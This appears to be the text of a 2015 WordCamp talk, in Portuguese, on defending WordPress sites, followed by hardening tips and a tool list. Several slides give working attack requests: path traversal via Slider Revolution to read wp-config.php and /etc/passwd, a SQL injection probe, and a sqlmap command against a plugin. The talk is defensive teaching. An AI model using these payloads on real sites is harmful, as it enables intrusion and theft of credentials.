Evento: WordCamp Belo Horizonte 2015 Data: 13/06/2015 Desenvolvimento para WordPress deve sempre levar em conta segurança e padrões de programação. Seja um Hackers implementando regras e dicas de segurança para manter seu WordPress seguro.

1. WordPress vs Hacker
Blindando seu WordPress

2. Quem somos?

3. Quem sou ?
Lenon Leite @lenonleite
DevOps + Workholic + TDAH
=
EU

4. Quem sou ?
Thiago Dieb @thiagodieb
++ Ansioso;
-- TDAH;

5. Atual realidade do WordPress
Fonte: https://wappalyzer.com/categories/cms 24/04/2015

6. WordPress é Seguro
● 100% seguro == false;
● WordPress ou CMS próprio?
● WordPress
○ Estável;
○ Rápida resposta de
atualização;
○ Colaborativo;

7. E os plugins e temas?
● Todos os Plugins e Temas são do
WordPress.org == false;
● Utilidade X Segurança == (?);
● Pagos X Não pagos == (?);
● Quanto ++ Plugins == ++ Risco;
● Temas piratas == ++ Risco;

8. Vamos começar….

9. A falhas em temas e plugins...
● LFD (local file download);
● File Upload;
● Sql Injection;
● Brute Force;
● XSS - (Cross-site Scripting)
○ Jetpack, Google Analitcs Yost,
WordPress SEO;

10. LFD
ThemeForest e CodeCanyon;
Lista mais de mil temas…
=O
“Slider Revolution”
http://marketblog.envato.com/news/affected-themes/

11. LFD

12. LFD
Exemplo ...
http://wordpress.local/wp-admin/admin-ajax.php?
action=revslider_show_image&img=../wp-config.php
http://wordpress.local/wp-admin/admin-ajax.php?
action=revslider_show_image&img=../../../../etc/passwd

13. LFD

14. File upload
Exemplo ...
http://wordpress.local/wp-
content/themes/curvo/functions/upload-handler.php

15. File upload

16. Sql injection
Exemplo ...
http://wordpress.local/wp-content/plugins/formcraft/form.
php?id=1%27
python sqlmap.py -u 'http://wordpress.local/wp-
content/plugins/formcraft/form.php?id=1' --dbs

17. Sql injection

18. Bruteforce

19. Modo de proteção

20. Previnir - Easy
● Alteração do nome do usuário
“admin” == false;
● Senha HARDCORE == true;
● Somente Plugins e Temas que
vai utilizar == true;
● Vários plugins de segurança ==
false;
● Pesquisar sobre os plugins e
temas utilizados == true;
● Modo Debug false;
● Manter o core, temas e plugins
atualizados;

21. Previnir - Medium
● Desabilitar a função de edição dos
temas e plugins == true;
● Bloquear Brute force == true;
● Bloquear visualização de pasta ==
true;
● Usar robots.txt == true;
● Acessar todos os dias == true;
● Comprar temas ou plugins == false;
● Usar as constantes no wp-config:
WP_CONTENT_DIR, WP_PLUGIN_DIR,
UPLOADS,WP_AUTO_UPDATE_CORE,
WP_HTTP_BLOCK_EXTERNAL

22. Previnir - Hard
● Prepração de infra == true;
● Pentest no próprio site == true
pra porra!
○ Use WpScan;
○ Use Accunetix;
○ Use Metaexploit;
● Alterar e bloquear o wp-admin/ ==
true;
● Bloquear páginas /author/*
● Sempre informado == true;

23. Não basta só proteger o WordPress

24. O cuidado deve ser além

25. Olha quem caiu… kkkk

26. Olha quem caiu… kkkk
Globo

27. Olha quem caiu… kkkk
Extra

28. Ferramentas
WpScan -> Scan de vunerabilidades em WordPress.
http://wpscan.org/
SqlMap -> Exploração de sql injection.
http://sqlmap.org/
MetaSploit -> Exploração de vulnerabilidades.
http://www.metasploit.com/
Acunetix -> Exploração de vulnerabilidades.
http://www.acunetix.com/
John the Ripper -> Ferramenta de Brute Force, e quebra de hashs.
http://www.openwall.com/john/
InurlBr -> Vunerabilidades em Massa.
https://github.com/googleinurl/SCANNER-INURLBR

29. Sites e Links importantes.
Exploiters
http://www.exploit-db.com/
http://1337day.com/
http://www.cvedetails.com/
Links interessantes
http://www.wordpressexploit.com/
https://www.facebook.com/inj3ct0rs

30. Finalizando...
@lenonleite www.
lenonleite.com.br
@ThiagoDieb
www.dieb.com.br
www.aszone.com.br